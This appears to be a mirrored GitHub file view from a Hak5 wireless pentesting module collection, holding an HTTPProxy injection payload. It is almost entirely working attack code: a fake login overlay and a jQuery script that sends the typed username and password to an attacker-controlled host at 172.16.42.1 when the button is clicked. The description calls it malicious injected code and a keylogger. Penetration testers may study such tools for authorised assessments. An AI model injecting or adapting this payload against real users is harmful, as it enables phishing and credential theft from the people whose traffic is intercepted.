mirror of
https://github.com/hak5/nano-tetra-modules.git
synced 2025-10-29 16:58:09 +00:00
HTTPProxy will allow you to intercept the HTTP response and injection a malicious HTML/JavaScript code, also it has a keylogger written in JavaScript which allows the attacker to log the user inputs
24 lines
664 B
Plaintext
24 lines
664 B
Plaintext
|
|
|
|
<div style= 'position: fixed; top: 20px; left: 20px; height: 200px;background:white;color:black'>
|
|
|
|
<form>
|
|
Username : <input type='text' id='username'>
|
|
Password : <input type='text' id='pass'>
|
|
<button>Login</button>
|
|
</form>
|
|
|
|
</div>
|
|
|
|
<script src='http://172.16.42.1/jquery.min.js'></script>
|
|
|
|
<script>
|
|
|
|
$('button').click(function(){
|
|
$.ajax({url: 'http://172.16.42.1/responsePage.php?username='+document.getElementById('username').value+'&pass='+document.getElementById('pass').value, success: function(result){
|
|
|
|
}});
|
|
});
|
|
|
|
</script>
|
|
|